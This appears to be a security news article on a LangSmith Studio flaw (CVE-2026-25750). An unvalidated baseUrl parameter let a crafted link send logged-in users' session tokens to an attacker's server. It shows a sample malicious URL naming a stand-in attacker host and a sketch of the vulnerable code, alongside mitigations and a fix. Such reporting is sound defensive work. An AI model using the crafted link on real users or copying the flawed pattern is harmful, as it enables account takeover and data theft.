A vulnerability in LangSmith, a widely used AI observability platform, could have allowed attackers to hijack user accounts and access sensitive enterprise data flowing through large language model (LLM) systems.
Researchers at Miggo Security discovered the flaw, which could have allowed token theft and account takeover if a logged-in user visited a malicious webpage.
The vulnerability "… exposed users to potential token theft and account takeover," the researchers said.
Why CVE-2026-25750 Puts Enterprise AI Data at Risk
LangSmith plays a central role in modern AI development and operations, acting as an observability layer for organizations building and deploying LLM applications.
The platform is widely used to monitor model behavior, troubleshoot errors, and analyze execution traces generated during AI workflows.
In practice, this means LangSmith processes enormous volumes of telemetry and debugging data as companies refine and maintain their AI systems.
Because LangSmith sits at the intersection of application logic, internal tools, and enterprise data pipelines, it often contains highly sensitive operational information.
Trace logs can capture detailed records of how an AI system interacts with databases, APIs, and internal services during runtime.
According to Miggo Security’s research, attackers who successfully exploited the vulnerability could potentially access sensitive data embedded within these logs — including internal SQL queries, proprietary system prompts, API responses, or even customer records.
For organizations relying on LangSmith to observe LLM workflows, an account compromise could therefore expose not only chat logs but also the underlying logic and data flows powering their AI systems.
How the LangSmith Vulnerability Works
The vulnerability, tracked as CVE-2026-25750, originated from a configuration feature within LangSmith Studio, the platform’s developer interface.
Studio is designed to provide flexibility for developers who may want to run the interface locally or in remote environments while still accessing their authenticated cloud account.
To support this capability, the application accepts a baseUrl parameter, which specifies the backend API endpoint that the Studio interface should communicate with.
Under normal circumstances, this parameter allows developers to redirect API calls to different environments, such as staging or development systems.
Previously, the application did not validate the domain supplied in the baseUrl parameter, allowing the frontend to trust the user-provided value and send API requests — including authentication credentials — to any specified destination.
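The vulnerable pattern can be sketched roughly as follows. This is an illustrative Python reconstruction, not LangSmith's actual code; the function name, default endpoint, and parameter handling are assumptions based on the behavior described above.

```python
from urllib.parse import parse_qs, urlparse

# Assumed default backend endpoint, used when no override is supplied.
DEFAULT_API_BASE = "https://api.smith.langchain.com"

def resolve_api_base(studio_url: str) -> str:
    """Vulnerable pattern: trust whatever baseUrl the query string supplies.

    Every authenticated API call the frontend then makes is addressed to
    this destination, session credentials included.
    """
    params = parse_qs(urlparse(studio_url).query)
    # No validation of the host: an attacker-supplied value is used verbatim.
    return params.get("baseUrl", [DEFAULT_API_BASE])[0]
```

With this logic, a Studio URL carrying `baseUrl=https://attacker-server.com` resolves to the attacker's origin, so every subsequent authenticated request is sent there instead of to the legitimate backend.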
How Attackers Could Trigger the Exploit
This lack of validation created an opportunity for attackers to craft a malicious URL designed to redirect authenticated requests.
For example, an attacker could generate a link such as:
https://smith.langchain.com/studio/?baseUrl=https://attacker-server.com
If a victim who was already logged into LangSmith visited a webpage that automatically triggered this URL — through a malicious script or embedded redirect — the browser would load the legitimate LangSmith Studio interface.
However, instead of sending API requests to the official LangSmith backend, the requests would be silently redirected to the attacker-controlled server.
Because the victim already had an active authenticated session, the browser would include the user’s session credentials with the request.
The attacker could then intercept the request, capture the session token, and use it to impersonate the victim.
What Attackers Can Access
Researchers said the stolen session token remained valid for about five minutes — enough time for attackers to access the victim’s account and retrieve data or modify settings.
Successful exploitation could allow attackers to steal system prompts that define how an organization’s AI behaves, exfiltrate tool inputs and outputs that may contain sensitive data such as PII, PHI, or financial records, and modify or delete projects.
At the time of publication, there is no evidence that the vulnerability has been exploited in the wild, and a fix has been released to address the issue.
Mitigating Risks in AI Monitoring Platforms
As AI observability platforms become more embedded in enterprise environments, they are emerging as attractive targets for attackers.
The LangSmith vulnerability illustrates how configuration or business logic flaws can expose sensitive data flowing through AI systems.
Organizations should treat these platforms as critical infrastructure and apply the same security rigor used to protect core cloud services and data pipelines.
- Patch self-hosted LangSmith deployments to the latest version to ensure the Allowed Origins policy blocks malicious baseUrl requests.
- Monitor logs and platform activity for unusual API calls, unexpected outbound requests, or abnormal access to trace data that could indicate token misuse.
- Rotate session tokens, API keys, and other credentials if compromise is suspected, and enforce shorter session lifetimes where possible.
- Limit sensitive data exposure within AI observability traces by sanitizing prompts, responses, and tool outputs before they reach monitoring systems.
- Enforce identity controls such as MFA, SSO policies, and least-privilege access for observability platforms and AI tooling.
- Implement network and browser security controls — such as DNS filtering, outbound traffic restrictions, and secure browser policies — to prevent connections to attacker-controlled domains.
- Regularly test incident response plans, build playbooks around exploitation of AI observability platforms, and use attack simulation tools.
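The allowlist check behind the first recommendation can be sketched as follows. This is a minimal illustration assuming a fixed set of permitted backend hosts; the actual Allowed Origins policy in the patched release may differ.

```python
from urllib.parse import urlparse

# Hosts the frontend is permitted to talk to (illustrative values).
ALLOWED_API_HOSTS = {
    "api.smith.langchain.com",
    "localhost",  # local development deployments
}

def is_allowed_base_url(base_url: str) -> bool:
    """Reject any baseUrl whose scheme or host falls outside the allowlist."""
    parsed = urlparse(base_url)
    if parsed.scheme not in ("https", "http"):
        return False  # e.g. javascript: or data: URLs
    if parsed.scheme == "http" and parsed.hostname != "localhost":
        return False  # plaintext allowed only for local development
    return parsed.hostname in ALLOWED_API_HOSTS
```

Validating the host before any request is dispatched closes the redirect path: the example attacker URL above fails the allowlist check, while legitimate backend and local-development endpoints still pass.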
Collectively, these measures help organizations reduce their exposure to account takeover risks while building greater resilience against attacks targeting AI observability platforms.
AI Infrastructure Is Expanding the Attack Surface
The LangSmith vulnerability reflects a broader shift in how organizations should think about AI infrastructure.
Observability platforms now sit at the center of many AI pipelines, collecting trace data that may include proprietary prompts, operational workflows, and other sensitive enterprise information.
While these tools are designed to improve debugging and transparency, their access to internal systems can make them attractive targets if security controls are weak.
This growing reliance on interconnected AI platforms is one reason organizations are turning to zero trust solutions, which assume no system, application, or user should be trusted by default.
